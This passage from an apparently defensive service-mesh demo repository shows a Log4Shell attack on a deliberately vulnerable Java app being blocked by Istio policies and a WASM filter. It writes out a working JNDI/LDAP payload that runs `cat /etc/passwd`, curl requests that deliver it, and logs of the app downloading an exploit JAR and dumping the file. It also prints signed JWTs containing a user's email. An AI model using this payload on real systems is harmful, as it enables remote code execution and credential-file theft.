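	encoded := base64.StdEncoding.EncodeToString([]byte(cmd))
	fmt.Printf("${jndi:ldap://log4shell:1389/exec/%s}\n", encoded)
}
```

Running this prints `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}`, the same payload used throughout this demo.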
29 | 30 | The current implementation of the exploit reads malicious LDAP lookup strings and parses a Base64-encoded command that is then executed. For example, the 31 | malicious string `"${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}"` will instruct the exploit to execute a `cat /etc/passwd` command. The vulnerable 32 | application logs the value of the `name` claim in a JWT token, so if the malicious payload is set there, the exploit will be triggered. 33 | 34 | ### Running applications locally 35 | 36 | The three applications can be easily run locally, although you won't be able to try all the [Istio](https://istio.io/) 37 | features showcased in the demo. However, it is enough to get the applications running and to be able to play with them 38 | and the WASM plugin. 39 | 40 | You can start the applications locally with: 41 | 42 | ```bash 43 | make -C wasm-patch clean compile # docker-compose needs the WASM binary to have been compiled 44 | docker-compose build 45 | docker-compose up 46 | ``` 47 | 48 | This will build the necessary images and start all of them. The vulnerable application is exposed as follows: 49 | 50 | * `http://localhost:8080` - Direct access to the vulnerable application. 51 | * `http://localhost:8000` - Access through Envoy, which includes filtering with the WASM plugin. 52 | 53 | To test it, you can send a request to the application or Envoy proxy with a JWT Bearer token in the Authorization header. 54 | The contents of the "name" claim in the provided token, if present, will trigger the attack vector. For example: 55 | 56 | **Executing the requests directly against the vulnerable app** 57 | 58 | ```bash 59 | $ curl http://localhost:8080 60 | Welcome, anonymous! 61 | Accessing: / 62 | 63 | $ curl http://localhost:8080 -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDMyMTY1NTEsImlhdCI6MTY0MzIxMjk1MSwiaXNzIjoidGV0cmF0ZS5pbyIsIm5hbWUiOiIke2puZGk6bGRhcDovL2xvZzRzaGVsbDoxMzg5L2V4ZWMvWTJGMElDOWxkR012Y0dGemMzZGtDZz09fSIsInN1YiI6ImFkbWluIn0.KTpoau4cr75ifcvESisRnwJP6_8fxzLrY2MsvgPBITI" 64 | Welcome, ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}! 65 | Accessing: / 66 | ``` 67 | 68 | We can see that the exploit was triggered by inspecting the vulnerable app logs: 69 | 70 | ``` 71 | log4shell_1 | received request from 192.168.160.3:37650 72 | log4shell_1 | delivering malicious LDAP payload: {cn=pwned, exec/Y2F0IC9ldGMvcGFzc3dkCg== [{cn [pwned]} {javaClassName [io.tetrate.log4shell.exploit.Log4shellExploit]} {javaCodeBase [http://log4shell:3000/log4shell-exploit-1.0-SNAPSHOT.jar]} {objectclass [javaNamingReference]} {javaFactory [io.tetrate.log4shell.exploit.Log4shellExploit]}]} 73 | vulnerable_1 | /!\ /!\ /!\ You have been pwned!
74 | vulnerable_1 | /!\ /!\ /!\ RCE exploit loaded 75 | vulnerable_1 | /!\ /!\ /!\ Executing: cat /etc/passwd 76 | vulnerable_1 | 77 | vulnerable_1 | root:x:0:0:root:/root:/bin/bash 78 | vulnerable_1 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 79 | vulnerable_1 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 80 | vulnerable_1 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 81 | vulnerable_1 | sync:x:4:65534:sync:/bin:/bin/sync 82 | vulnerable_1 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 83 | vulnerable_1 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 84 | vulnerable_1 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 85 | vulnerable_1 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 86 | vulnerable_1 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 87 | vulnerable_1 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 88 | vulnerable_1 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 89 | vulnerable_1 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 90 | vulnerable_1 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 91 | vulnerable_1 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 92 | vulnerable_1 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 93 | vulnerable_1 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 94 | vulnerable_1 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 95 | vulnerable_1 | systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false 96 | vulnerable_1 | systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false 97 | vulnerable_1 | systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false 98 | vulnerable_1 | systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false 99 | vulnerable_1 | messagebus:x:104:108::/var/run/dbus:/bin/false 100 | vulnerable_1 | 101 | vulnerable_1 | 13:40:09.410 [qtp1316061703-12] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - welcoming user: pwned! 102 | ``` 103 | 104 | **Executing the requests against the Envoy proxy** 105 | 106 | When running the requests through the proxy we can see the access being denied as the traffic is filtered by the WASM plugin. 107 | 108 | ```bash 109 | $ curl http://localhost:8000 110 | Welcome, anonymous! 111 | Accessing: / 112 | 113 | $ curl http://localhost:8000 -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDMyMTY1NTEsImlhdCI6MTY0MzIxMjk1MSwiaXNzIjoidGV0cmF0ZS5pbyIsIm5hbWUiOiIke2puZGk6bGRhcDovL2xvZzRzaGVsbDoxMzg5L2V4ZWMvWTJGMElDOWxkR012Y0dGemMzZGtDZz09fSIsInN1YiI6ImFkbWluIn0.KTpoau4cr75ifcvESisRnwJP6_8fxzLrY2MsvgPBITI" 114 | Access Denied 115 | ``` 116 | 117 | ## ZTA demo step by step 118 | 119 | If you want to play with the demo, you can follow the step by step guide in the [DEMO.md](DEMO.md) file. 120 | -------------------------------------------------------------------------------- /ngac/README.md: -------------------------------------------------------------------------------- 1 | # Policy enforcement with NGAC 2 | 3 | In this section we'll see how we can enforce access based on an NGAC graph. We will do 4 | that based on some custom claims that are present in the JWT token of the authenticated user. 5 | 6 | ## Enabling custom claims in Auth0 7 | 8 | Before we begin, we need to configure Auth0 to include additional custom claims 9 | in the issued tokens. 
we can do that as follows in the Auth0 management console: 10 | 11 | * Go to the User, edit it, and add the following in the `user_metadata` field, then **Save**: 12 | ```json 13 | { 14 | "group": "Engineering" 15 | } 16 | ``` 17 | You can add all information you want, but this example will use the `group` claim. 18 | * Now we have to create an _Action_ that will inject all user metadata as custom claims in the issued tokens. 19 | Go to **Actions > Library**. Click the **Build Custom** button, select the **Login / Post Login**, give it 20 | a name, and **Create**. In the next screen, paste this code snippet and click **Deploy**: 21 | ```javascript 22 | exports.onExecutePostLogin = async (event, api) => { 23 | const namespace = 'https://zta-demo/'; 24 | for (let key in event.user.user_metadata) { 25 | api.idToken.setCustomClaim(namespace + key, event.user.user_metadata[key]); 26 | } 27 | }; 28 | ``` 29 | Once that is done, go to **Actions > Flows**. Select **Login**, drag & drop the custom action you've just 30 | created between the _Login_ and the _Complete_ boxes, and click **Apply**. 31 | 32 | ## Deploy the NGAC enforcer 33 | 34 | Once the user has been configured with additional claims, let's deploy the NGAC enforcer as follows: 35 | 36 | ```bash 37 | $ source ../k8s/variables.env 38 | $ make install 39 | $ kubectl apply -f ../config/ngac-policy.yaml 40 | ``` 41 | 42 | Similar to the OIDC policy, if you inspect [the policy](../config/ngac-policy.yaml) file you'll see 43 | that it applies to the `vulnerable` app and that it uses a `CUSTOM` target that delegates to the 44 | `ngac-grpc` provider. 45 | 46 | ## Group based access control 47 | 48 | Before starting, make sure you logout by going to the `/logout` path so you get a new token with the claims 49 | we just created. 50 | 51 | After deploying the NGAC enforcer, you'll see that you still have access to the application. If 52 | you open the browser and go to the app, you'll see something like: 53 | 54 | ``` 55 | Welcome, Ignasi! 56 | Group: Engineering 57 | Accessing: / 58 | 59 | Authenticated with token: 60 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJodHRwczovL3p0YS1kZW1vL2NvdW50cnkiOiJFUyIsImh0dHBzOi8venRhLWRlbW8vZ3JvdXAiOiJFbmdpbmVlcmluZyIsIm5pY2tuYW1lIjoiaWduYXNpK3Rlc3QiLCJuYW1lIjoiSWduYXNpIiwicGljdHVyZSI6Imh0dHBzOi8vcy5ncmF2YXRhci5jb20vYXZhdGFyLzA0NGMyNTUwOTg0MTYzYzk5NDc3Y2QzZDJiNjQ1ZWI0P3M9NDgwJnI9cGcmZD1odHRwcyUzQSUyRiUyRmNkbi5hdXRoMC5jb20lMkZhdmF0YXJzJTJGaWcucG5nIiwidXBkYXRlZF9hdCI6IjIwMjItMDEtMjRUMjE6NDU6MDMuMTE0WiIsImVtYWlsIjoiaWduYXNpK3Rlc3RAdGV0cmF0ZS5pbyIsImVtYWlsX3ZlcmlmaWVkIjp0cnVlLCJpc3MiOiJodHRwczovL25hY3gtZG16LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MWU3ZjQ1YTc2ZGMzYTAwNmFhZTUwZGIiLCJhdWQiOiJkeXlXMG1lNExxOG4zdFkzMEZhdHVEUUZYcHRadm00byIsImlhdCI6MTY0MzA2MTQ2OSwiZXhwIjoxNjQzMDk3NDY5LCJub25jZSI6Ikh4TU43Y2RSbEhFWVlGQlBVNEJMUXY3STdKOE5ZMm92eDVRVUI3ZnVsWFkifQ.iBN9AUedfIo8AuXG3-YbJ8PB1xCR7avV49dBPGDTjkzhh0c_VwXLIJaAqotxXRQJFx7J8sRC_iq6ej4uvHbSnu563GmTazg0Sj1Vuf3uwa81YglJiSfpZNvmfCCMROJtk1ACB7dj54bMPWLXVlA-nqMqp6Q7WJtRGNFesQ9Cra__6T1awvHgq1rlg8hfCDeHpsx3K-D8yoUB1sDxLk3tdVVvJnWm01xM9cNn3Fr51nde6aoNaaijISHZoMkSEb7sNfOVtdqItG3WlHe8LNisGrwuWJF0kiqC_4gfCodF5PAe-3-dRuELGpD4s8hitIs1tGxm-qz6ZfyZWEdL5alfjQ 61 | ``` 62 | 63 | However, if you try to access the `/private` URL, you'll get a `403 Access denied` response. 
Looking at the 64 | logs of the NGAC enforcer we can see: 65 | 66 | ```bash 67 | $ kubectl logs -n ngac -l app=ngac-authz 68 | 2022/01/24 23:51:28 debug Resolved by: jwt_bearer, Engineering [scope="pep"] 69 | 2022/01/24 23:51:28 debug Resolved by: request_path, /private [scope="pep"] 70 | 2022/01/24 23:51:28 debug Resolved by: method, GET [scope="pep"] 71 | 2022/01/24 23:51:28 debug check(Engineering [GET] -> /private) = false [scope="pep"] 72 | 2022/01/24 23:51:28 debug PC(http) [scope="pdp/audit"] 73 | 2022/01/24 23:51:28 debug deny(access denied) [scope="pep"] 74 | ``` 75 | 76 | It has read the `group` claim value and checked against the [NGAC graph](graph.txt) if the group has 77 | permissions on the requested URI, but access is denied. 78 | 79 | Let's see what happens if the user is moved to the **Admins** group. To do so: 80 | 81 | * Go to the management console in Auth0, and modify the user's **group** claim from Engineering to **Admins** (note that all 82 | the values are case sensitive). 83 | * In the browser, logout again by going to the `/logout` path to go back to the login screen to get a new token. 84 | * Once that is done, login and access the `/private` endpoint again. The request should succeed and you should 85 | see something like: 86 | ``` 87 | Welcome, Ignasi! 88 | Group: Admins 89 | Accessing: /private 90 | 91 | Authenticated with token: 92 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJodHRwczovL3p0YS1kZW1vL2NvdW50cnkiOiJFUyIsImh0dHBzOi8venRhLWRlbW8vZ3JvdXAiOiJBZG1pbnMiLCJuaWNrbmFtZSI6ImlnbmFzaSt0ZXN0IiwibmFtZSI6IklnbmFzaSIsInBpY3R1cmUiOiJodHRwczovL3MuZ3JhdmF0YXIuY29tL2F2YXRhci8wNDRjMjU1MDk4NDE2M2M5OTQ3N2NkM2QyYjY0NWViND9zPTQ4MCZyPXBnJmQ9aHR0cHMlM0ElMkYlMkZjZG4uYXV0aDAuY29tJTJGYXZhdGFycyUyRmlnLnBuZyIsInVwZGF0ZWRfYXQiOiIyMDIyLTAxLTI0VDIzOjQyOjQwLjQ0NloiLCJlbWFpbCI6ImlnbmFzaSt0ZXN0QHRldHJhdGUuaW8iLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiaXNzIjoiaHR0cHM6Ly9uYWN4LWRtei5ldS5hdXRoMC5jb20vIiwic3ViIjoiYXV0aDB8NjFlN2Y0NWE3NmRjM2EwMDZhYWU1MGRiIiwiYXVkIjoiZHl5VzBtZTRMcThuM3RZMzBGYXR1RFFGWHB0WnZtNG8iLCJpYXQiOjE2NDMwNjc3NjEsImV4cCI6MTY0MzEwMzc2MSwibm9uY2UiOiJKa096aHNMS181V1JOMFJLSmUxb0d6V3UwVXNqOENCaWhJbkRNbm5zSzVJIn0.lyJ3Z70wj3VjqLOD5CF3yZqOA4kcyogEy_xRG82uMEYKSaQ3eXb71ZRRQtsZyosjycKrEr3-9HKHrLUlsV1NDyooNlFkMPls__Li0MkDg3cpokQ17m1V5B6NCcisN4arJIzYawCb9pbKqnOpOwKrNdt8Um7g2TDMD2ZrsuFpfBva_O_a6Z8JY3f6QDShSazKA51F8URatq4ZydxjxMGw96qa46X6DpKtDR2vFwDb78fu2RGehst_KKWFxzTU7mF5aF_7cVIqwvqxpWsglGIteZqS2B8JA1QSK2pRZOpNER7ciCwftoYx8wgxYJmfEaHfqV4YvmBvqNhV9FbSEwct3A 93 | ``` 94 | 95 | Checking the NGAC enforcer logs we'll see that now it is allowing access: 96 | 97 | ```bash 98 | $ kubectl logs -n ngac -l app=ngac-authz 99 | 2022/01/24 23:50:33 debug Resolved by: jwt_bearer, Admins [scope="pep"] 100 | 2022/01/24 23:50:33 debug Resolved by: request_path, /private [scope="pep"] 101 | 2022/01/24 23:50:33 debug Resolved by: method, GET [scope="pep"] 102 | 2022/01/24 23:50:33 debug check(Admins [GET] -> /private) = true [scope="pep"] 103 | 2022/01/24 23:50:33 debug PC(http) [scope="pdp/audit"] 104 | 2022/01/24 23:50:33 debug Admins-privileged-protected-/private ops=[GET] [scope="pdp/audit"] 105 | 2022/01/24 23:50:33 debug allow() [scope="pep"] 106 | ``` 107 | 108 | ## Environment cleanup 109 | 110 | To cleanup the environment and uninstall the NGAC enforcers, you can use 111 | the following command: 112 | 113 | ```bash 114 | $ make uninstall 115 | ``` 116 | -------------------------------------------------------------------------------- /DEMO.md: 
-------------------------------------------------------------------------------- 1 | # ZTA and DevSecOps for Cloud Native Applications demo 2 | 3 | The following steps show how a Service Mesh can provide the 4 | features of a Security Kernel suitable for a Zero Trust Architecture 5 | Platform. We will see: 6 | 7 | * How a service mesh leverages **runtime identities** to protect 8 | service-to-service communications. 9 | * How it can enforce **user identity based policies** and integrate with 10 | external or corporate Identity Providers. 11 | * How policy is **enforced at the application level**, not only at the 12 | perimeter. 13 | * How **targeted application policies** can be applied to affect only a subset 14 | of the applications in the mesh. 15 | 16 | The demo consists of a [Java application](vulnerable-app) that is vulnerable to the `Log4Shell` 17 | exploit. We will use the service mesh to enforce that access is authenticated on the 18 | corporate Identity Provider, that only the right users and local services can access 19 | the application, and that malicious payloads that trigger the `Log4Shell` exploit 20 | are rejected. 21 | 22 | ## Install the demo environment 23 | 24 | Before starting, install the demo environment following the instructions 25 | in the [k8s/README.md](k8s/README.md) file. 26 | 27 | ## 1. Access the vulnerable application 28 | 29 | Once you have deployed the demo environment you will be able to access the vulnerable 30 | application at: 31 | 32 | * `https://` - if you used the `gke` mode. 33 | * `https://localhost:8443` - if you used the `local` mode. 34 | 35 | You will see something like this: 36 | 37 | ``` 38 | Welcome, anonymous! 39 | Accessing: / 40 | ``` 41 | 42 | ## 2. Enforce user identities 43 | 44 | We don't want to allow unauthenticated users to access our application, so let's 45 | apply a policy that configures the ingress gateway to require authentication against 46 | the corporate Identity Provider. You can check the [OIDC configuration](k8s/manifests/istio-authservice.yaml) 47 | to see how the different URLs involved in the OpenID Connect protocol are configured. 48 | 49 | ```bash 50 | $ kubectl apply -f config/oidc-policy.yaml 51 | ``` 52 | 53 | If you inspect [the policy](config/oidc-policy.yaml) file you'll see that it applies to the `istio-ingressgateway` 54 | and that it uses a `CUSTOM` target that delegates to the `authservice-grpc` provider. 55 | The provider is configured in the Istio global mesh config, which you can check with: 56 | 57 | ```bash 58 | $ kubectl -n istio-system describe configmap istio 59 | ``` 60 | 61 | Once the policy is applied you can refresh the browser and you will be redirected to the 62 | Identity Provider login page. After logging in and accepting the consent screen, you'll 63 | see something like: 64 | 65 | ``` 66 | Welcome, Ignasi!
67 | Accessing: / 68 | 69 | Authenticated with token: 70 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJuaWNrbmFtZSI6ImlnbmFzaSt0ZXN0IiwibmFtZSI6IklnbmFzaSIsInBpY3R1cmUiOiJodHRwczovL3MuZ3JhdmF0YXIuY29tL2F2YXRhci8wNDRjMjU1MDk4NDE2M2M5OTQ3N2NkM2QyYjY0NWViND9zPTQ4MCZyPXBnJmQ9aHR0cHMlM0ElMkYlMkZjZG4uYXV0aDAuY29tJTJGYXZhdGFycyUyRmlnLnBuZyIsInVwZGF0ZWRfYXQiOiIyMDIyLTAxLTIzVDEwOjQyOjA2Ljg2NVoiLCJlbWFpbCI6ImlnbmFzaSt0ZXN0QHRldHJhdGUuaW8iLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiaXNzIjoiaHR0cHM6Ly9uYWN4LWRtei5ldS5hdXRoMC5jb20vIiwic3ViIjoiYXV0aDB8NjFlN2Y0NWE3NmRjM2EwMDZhYWU1MGRiIiwiYXVkIjoiZHl5VzBtZTRMcThuM3RZMzBGYXR1RFFGWHB0WnZtNG8iLCJpYXQiOjE2NDI5MzQ1MjcsImV4cCI6MTY0Mjk3MDUyNywibm9uY2UiOiJsOUV4dW1EUUZQc3Z4VzJ1YkhSUHpiUDA1aFJuYnQ1dFBKNXJaRXVrSFlvIn0.AUr-S54HmRosQaHLFN99hxj1eP1NyDkk_42Bihlbh5OyQdTba-J_KYwWqUHPYdry8RQmHzYz6moDH3hynV5TRCDP0TNzCc9Y6eYoQmT0U59ZeKL1d38XMmGdTBTbzwMCRKoGf4wyopBPsFsIE2tH4iUMBiL7uKw_0kgjOr2UxJcUQR7bPVyvRSXIanxdrrtSWgpBdibAZ80c-z2V7m9uWJM8Tz_SjVwVm1PiXh_nkptFnWfq-i8J_aMNpDLU_RIn2D4nz_omBLdvSRQYjKyFMUIQZ8Huctpx-bKcBJFHT7l2QFjFMyaB00GKFLbsFCk3EDNeWQ8E8a8nn4fPooabbg 71 | ``` 72 | 73 | ## 3. Enforce runtime access 74 | 75 | Now we have configured our ingress to require a user login. We could have applied this policy 76 | directly to the application sidecar, but for demo purposes we'll do it just at the ingress level. 77 | 78 | This means that any other service in the cluster could directly reach the application without going through 79 | the ingress. We can check this by launching a new pod and accessing the app as follows: 80 | 81 | ```bash 82 | $ kubectl run tmp-shell --rm -i --tty --image nicolaka/netshoot -- /bin/bash 83 | bash-5.1# curl http://vulnerable.zta-demo:8080 84 | Welcome, anonymous! 85 | Accessing: / 86 | bash-5.1# exit 87 | ``` 88 | 89 | Let's create a runtime policy that enforces that our application can only be reached from the ingress gateway. 90 | Services in the cluster will no longer have direct access to it: 91 | 92 | ```bash 93 | $ kubectl apply -f config/runtime-authn.yaml 94 | ``` 95 | 96 | If you inspect [the contents of the policy](config/runtime-authn.yaml) you'll see that it applies to the `vulnerable` application and that 97 | it only allows access from a specific source principal. That source principal matches the 98 | [SPIFFE identity](https://spiffe.io/docs/latest/spiffe-about/spiffe-concepts/#spiffe-id) of the Istio Ingress Gateway. 99 | 100 | We can now try to directly access the application again from inside the cluster: 101 | 102 | ```bash 103 | $ kubectl run tmp-shell --rm -i --tty --image nicolaka/netshoot -- /bin/bash 104 | bash-5.1# curl http://vulnerable.zta-demo:8080 105 | RBAC: access denied 106 | bash-5.1# exit 107 | ``` 108 | 109 | Now we get an access denied, because the proxy sidecar in the application pod is rejecting the connection since the 110 | runtime identity presented by our workload does not match the configured one. 111 | 112 | ## 4. Targeted application policy 113 | 114 | The deployed Java application is vulnerable to `Log4Shell`, as it uses Java and `log4j` versions vulnerable to the 115 | popular CVEs. It logs information from the JWT token without sanitizing it first, so the exploit is easy to trigger. To 116 | demonstrate the attack, let's inject some malicious payloads in the token by setting some claims in our User profile: 117 | 118 | * In the Auth0 management console, go to **Users Management > Users**. Select your user and **Edit** the **Name** field.
119 | Put the following value and save: `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}` 120 | * In the browser, go to the `/logout` path to go back to the login screen to get a new token. 121 | * Log in again. You'll see a normal output: 122 | ``` 123 | Welcome, ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}! 124 | Accessing: / 125 | 126 | Authenticated with token: 127 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJuaWNrbmFtZSI6ImlnbmFzaSt0ZXN0IiwibmFtZSI6IiR7am5kaTpsZGFwOi8vbG9nNHNoZWxsOjEzODkvZXhlYy9ZMkYwSUM5bGRHTXZjR0Z6YzNka0NnPT19IiwicGljdHVyZSI6Imh0dHBzOi8vcy5ncmF2YXRhci5jb20vYXZhdGFyLzA0NGMyNTUwOTg0MTYzYzk5NDc3Y2QzZDJiNjQ1ZWI0P3M9NDgwJnI9cGcmZD1odHRwcyUzQSUyRiUyRmNkbi5hdXRoMC5jb20lMkZhdmF0YXJzJTJGaWcucG5nIiwidXBkYXRlZF9hdCI6IjIwMjItMDEtMjRUMDg6MjM6NDguODY5WiIsImVtYWlsIjoiaWduYXNpK3Rlc3RAdGV0cmF0ZS5pbyIsImVtYWlsX3ZlcmlmaWVkIjp0cnVlLCJpc3MiOiJodHRwczovL25hY3gtZG16LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MWU3ZjQ1YTc2ZGMzYTAwNmFhZTUwZGIiLCJhdWQiOiJkeXlXMG1lNExxOG4zdFkzMEZhdHVEUUZYcHRadm00byIsImlhdCI6MTY0MzAxMjYyOSwiZXhwIjoxNjQzMDQ4NjI5LCJub25jZSI6IlQ5c2Q2LTZsNDlNVGRkUXFOLVJkeEplYmMwS1VsNk1OOVJmRWtkMVZVWjgifQ.FUi8ydGHDksc_B6YfmE-xCmSvdfOtroxJ5MOp5aern-JK3Qrcm0lYo4NNcxRdDg65AbS93hklexBRLBzfTd5B8jopiyzqmznMtafxV9rrH_ZS2-oBrfc-soLQf0r9d8T0tTnnidtfAbPSwNyv5zKiFHXxHGHoX-x6wjZahCt-pKk4uoCdTDGgCp2751yXF1FJSLcC8v8kiSC9lZhm7xJxVFvP19zZ30PadD9b_QOu3Xs-yOz2LxCXCXImQZvfuCV2YFOvVGimfKz35WeEf5RAeJZkxoHN6G3oXnbEwgIAdAl6r68Gj2LUbloy8XvKgJk7IIcsSlAwETiiPWdemP3ag 128 | ``` 129 | * However, if we inspect the application container logs we'll see something like: 130 | ```bash 131 | $ kubectl logs -n zta-demo -l app=vulnerable --tail 30 132 | 133 | 08:23:49.369 [qtp1316061703-14] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - user resolved to: pwned! 134 | 08:23:49.535 [qtp1316061703-16] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - token payload: {"sub":"auth0|61e7f45a76dc3a006aae50db","aud":"dyyW0me4Lq8n3tY30FatuDQFXptZvm4o","email_verified":true,"updated_at":"2022-01-24T08:23:48.869Z","nickname":"ignasi+test","name":"${jndi:ldap:\/\/log4shell:1389\/exec\/Y2F0IC9ldGMvcGFzc3dkCg==}","iss":"https:\/\/nacx-dmz.eu.auth0.com\/","exp":1643048629,"iat":1643012629,"nonce":"T9sd6-6l49MTddQqN-RdxJebc0KUl6MN9RfEkd1VUZ8","picture":"https:\/\/s.gravatar.com\/avatar\/044c2550984163c99477cd3d2b645eb4?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fig.png","email":"ignasi+test@tetrate.io"} 135 | /!\ /!\ /!\ You have been pwned! 
136 | /!\ /!\ /!\ RCE exploit loaded 137 | /!\ /!\ /!\ Executing: cat /etc/passwd 138 | 139 | root:x:0:0:root:/root:/bin/bash 140 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 141 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 142 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 143 | sync:x:4:65534:sync:/bin:/bin/sync 144 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 145 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 146 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 147 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 148 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 149 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 150 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 151 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 152 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 153 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 154 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 155 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 156 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 157 | systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false 158 | systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false 159 | systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false 160 | systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false 161 | messagebus:x:104:108::/var/run/dbus:/bin/false 162 | 163 | 08:23:49.537 [qtp1316061703-16] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - user resolved to: pwned! 164 | ``` 165 | 166 | At this point, the vulnerable application has processed the malicious `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}` 167 | payload in the `name` claim of the JWT token, downloaded the exploit referenced by the malicious LDAP server at `log4shell:1389`, and executed the `cat /etc/passwd` command 168 | that comes base64-encoded in the payload. 169 | 170 | We can further verify this by inspecting the application sidecar logs. There we can see the application making an outbound 171 | call to `log4shell:3000` to download the exploit JAR that will be executed: 172 | 173 | ```bash 174 | $ kubectl -n zta-demo logs -l app=vulnerable -c istio-proxy | grep log4shell-exploit 175 | [2022-01-27T20:53:01.489Z] "GET /log4shell-exploit-1.0-SNAPSHOT.jar HTTP/1.1" 200 - via_upstream - "-" 0 3555 7 7 "-" "Java/1.8.0_102" "3c262a7d-a429-9665-a441-bf67c64488b3" "log4shell:3000" "10.88.1.75:3000" outbound|3000||log4shell.zta-demo.svc.cluster.local 10.88.0.145:48294 10.92.6.237:3000 10.88.0.145:56238 - default 176 | ``` 177 | 178 | To prevent this, we will deploy the [WASM patch](wasm-patch) to all the Java applications in the environment: 179 | 180 | ```bash 181 | $ envsubst < config/wasm-patch.yaml | kubectl apply -f - 182 | ``` 183 | 184 | The [patch file](config/wasm-patch.yaml) sets the `selectors` so that the patch is deployed only to Java applications, and it instructs 185 | the mesh to apply the WASM filter to every HTTP request. We can now refresh the page and this time we'll see the following: 186 | 187 | ``` 188 | Access Denied 189 | ``` 190 | 191 | We can check that the sidecar proxy in the application pod is rejecting the traffic via the WASM plugin we just deployed: 192 | 193 | ```bash 194 | $ kubectl -n zta-demo logs -l app=vulnerable -c istio-proxy | grep wasm 195 | 2022-01-24T08:35:18.968121Z info envoy wasm wasm log zta-demo.log4shell-patch: access denied for: ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==} 196 | ``` 197 | 198 | ## 5.
(Optional) NGAC policy enforcement 199 | 200 | Now that we have all the primitives we need to implement a Zero Trust Architecture, we can look at how to 201 | apply higher-level access control policies with NGAC. You can follow the steps in the [ngac/README.md](ngac/README.md) 202 | to configure user custom claims and enforce access using an NGAC graph. 203 | --------------------------------------------------------------------------------
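For intuition about what the NGAC enforcer decides, the checks logged in the [ngac/README.md](ngac/README.md) walkthrough (`check(Engineering [GET] -> /private) = false`, `check(Admins [GET] -> /private) = true`) boil down to asking whether the user's group is granted the requested operation on the requested resource. The following is a deliberately simplified, illustrative sketch of that kind of decision; it is not the actual enforcer, which resolves requests against the graph in [ngac/graph.txt](ngac/graph.txt):

```go
package main

import "fmt"

// assignment grants a user attribute (group) a set of operations on a resource.
type assignment struct {
	group    string
	resource string
	ops      map[string]bool
}

// policy is a flat list of assignments; the real NGAC enforcer derives these
// privileges from a graph of users, attributes, and policy classes instead.
type policy []assignment

// check returns true if the group is granted the operation on the resource.
func (p policy) check(group, op, resource string) bool {
	for _, a := range p {
		if a.group == group && a.resource == resource && a.ops[op] {
			return true
		}
	}
	return false
}

func main() {
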